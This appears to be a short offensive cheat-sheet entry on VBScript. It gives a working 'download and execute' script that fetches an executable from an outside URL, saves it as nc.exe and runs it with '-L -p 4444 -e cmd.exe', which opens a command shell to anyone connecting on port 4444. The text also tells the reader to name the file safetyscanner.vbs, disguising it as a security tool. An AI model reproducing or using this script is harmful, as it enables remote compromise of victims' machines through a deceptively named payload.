
when a VBScript is executed from the command line (cmd.exe), by default it uses wscript (GUI). cscript.exe can be launched explicitly, like this:

cscript console.vbs

shellcode execution with VBScript

VBScript Download & Execute

Downloads, decode, decrypt and executes a VBScript using cmd and mshta.

without obfuscation:

Put the following lines into a text file. Name it safetyscanner.vbs and put on desktop.

dim http_obj
dim stream_obj
dim shell_obj
set http_obj = CreateObject("Microsoft.XMLHTTP")
set stream_obj = CreateObject("ADODB.Stream")
set shell_obj = CreateObject("WScript.Shell")
URL = "http://www.mikemurr.com/example.exe" 'Where to download the file from
FILENAME = "nc.exe" 'Name to save the file (on the local system)
RUNCMD = "nc.exe -L -p 4444 -e cmd.exe" 'Command to run after downloading
http_obj.open "GET", URL, False
stream_obj.type = 1
stream_obj.write http_obj.responseBody
stream_obj.savetofile FILENAME, 2
shell_obj.run RUNCMD



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